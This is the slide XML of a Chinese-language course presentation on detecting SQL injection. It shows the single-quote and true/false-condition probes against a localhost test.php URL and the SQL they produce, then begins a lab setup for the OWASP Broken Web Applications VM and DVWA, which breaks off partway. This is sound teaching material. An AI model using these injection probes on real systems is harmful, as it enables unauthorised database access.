                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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021E763-AA40-5FB0-A1F5-C12302C0D8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834283" y="1627552"/>
            <a:ext cx="4968552" cy="4561954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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参数后添加一个单引号，若存在注入点则通常会返回一个错误提示。</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如果攻击者使用单引号注入</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http://localhost/test.php?userid=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="e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那么最终的语句将变为</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dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from category where userid=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1</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1180CC6B-0CF2-1963-22E4-A7C25E267698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1105935"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342437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7" y="1150213"/>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单引号法</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7" y="1675918"/>
            <a:ext cx="4968552"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单引号法很直接，也很简单，但是对</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注入有一定了解的程序员在编写程序时，都会将单引号过滤掉。如果再使用单引号测试，就无法检测到注入点了。这时，就可以使用经典的永真永假法。</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384032" y="1146546"/>
            <a:ext cx="172354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永真永假法</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336927" y="1675918"/>
            <a:ext cx="5104569" cy="4215706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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当与上一个永真式时逻辑不受影响，页面应当与原页面相同。例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>test.php?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</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传递给后台数据库服务器的</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语句则变为：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from category where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=1 and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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并不影响原逻辑；</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而与上一个永假式时，则会影响原逻辑，页面可能出错或跳转。</a:t>
            </a:r>
          </a:p>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例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>test.php?userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=1 and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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传递给后台数据库服务器的</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语句则变为：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from category where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=1 and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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69259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90B3F4-FA90-1A69-CF99-31301DCCBA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="635000"/>
            <a:ext cx="9753600" cy="1079499"/>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单引号法测试注入点的原理是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F870101-AC1B-032B-528E-E295F8453C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="191683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验证程序是否对输入进行了验证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BA3CE5-7164-E63F-7E69-A90B72B52EE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="277408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检查</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语法是否正确</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11267A48-13AD-B78B-F9BE-2724665081A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="363133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验证</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的请求方式是否为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GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E10249-5B37-2FB0-BD42-24A77CF2AA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="448858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验证</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逻辑是否正确</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C99A39-05B5-14E3-3615-B27ABD0CDEEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="198112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A11FEF41-1AFD-5323-924F-13385B325FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="283837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3E24CB3A-608D-4F6B-B8F3-DE3E24B8FC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="369562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CAE18BE3-983A-088C-62AF-64AEA77E89FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="455287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FB7F0B3F-22E0-4681-CDCA-754E8CE6172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2DD3CEB0-1353-A557-1DB6-9AB83AD33431}"/>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32D016A9-ADA0-01B5-E5F2-BA5223F5E91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89D3103D-7DB5-40BF-0F46-FA5FCCD335C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87158A6D-B02D-E074-BE6D-1138FEC921C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41378BF5-1D1F-D3AF-A3DD-B395932A254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645F6EC-9756-CBBE-FC29-17FBD3909387}"/>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5378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20305" y="1113280"/>
            <a:ext cx="2618024"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注入漏洞实验</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384032" y="1675016"/>
            <a:ext cx="4968552" cy="313496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首先，下载</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 Broken Web Applications VM</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下载地址：</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https://sourceforge.net/projects/owaspbwa/files/latest/download</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下载后解压缩，用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Vmware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虚拟机打开。用给定的用户名密码登录，然后用本机浏览器打开给定的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地址：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{169E3F4F-3473-BE94-C81C-8EFB9A1D0A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839417" y="1675918"/>
            <a:ext cx="4968552" cy="428912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测试环境中的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平台实施</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注入攻击。</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 </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Open Web Application Security Project)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，开放式</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应用程序安全项目是知名的</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安全与数据库安全研究组织。</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本实验基于</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发布的开源虚拟镜像</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>OWASP Broken Web Applications VM”</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来演示如何寻找</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注入漏洞。</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CB884E56-D2A4-3069-94AF-6C9DD316CE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408300" y="1113280"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148824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20305" y="1113280"/>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69E3F4F-3473-BE94-C81C-8EFB9A1D0A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839417" y="1675918"/>
            <a:ext cx="4968552" cy="3134961"/>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首先，下载</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 Broken Web Applications VM</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下载地址：</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https://sourceforge.net/projects/owaspbwa/files/latest/download</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下载后解压缩，用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Vmware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虚拟机打开。用给定的用户名密码登录，然后用本机浏览器打开给定的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地址：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB884E56-D2A4-3069-94AF-6C9DD316CE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408300" y="1113280"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B7AAB8-BA4C-FCBC-1F03-48CF906681FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2690" r="2830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6320669" y="1772816"/>
            <a:ext cx="5104569" cy="3200564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4B53C2-9359-31AD-06B0-F0EA08B5B6A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8256240" y="2708920"/>
            <a:ext cx="1584176" cy="252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80E7CC7-9C53-05E3-D8DA-BB7A6A5EEDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8328248" y="3770425"/>
            <a:ext cx="2592289" cy="252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82158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61FDFBE-26EF-1A18-3174-C7188CC4CB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1611261"/>
            <a:ext cx="7503080"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用浏览器打开之后，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Damn Vulnerable Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057C004A-EA8D-DD0A-769C-CE23AC40A897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="888942" y="2132856"/>
            <a:ext cx="10414115" cy="3771224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6590D586-0CFF-1875-2317-FAA0F640342E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055440" y="5395184"/>
            <a:ext cx="3384376" cy="4205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BEF31A8A-0D22-1760-A385-CCEC0E2E75CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1099328"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1415602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A290D8B-571B-65B9-FF9E-52B4943B5CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1589352"/>
            <a:ext cx="4896544" cy="70788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使用默认用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，默认密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进行登录：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F307F5A-5DC5-3536-7652-DB3A796380EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="917141" y="2348880"/>
            <a:ext cx="4818819" cy="3860310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{808A0493-4BB9-E123-58C4-21C78762721D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1121813"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09679D8-3BB2-11C4-2219-608B5D7B54E8}"/>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E9AE4B2-9B87-47EA-1E95-D466ED0FB05D}"/>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11E321B-6A65-A504-3E6E-661BE8D32A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1121812"/>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
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B3C7608-3817-A23C-453D-8A1FCD8B491D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1613623"/>
            <a:ext cx="360707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登录之后选择</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE42A6F2-DA54-2121-8D46-5C74D5542264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="48178"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="2049432"/>
            <a:ext cx="4968552" cy="4159757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
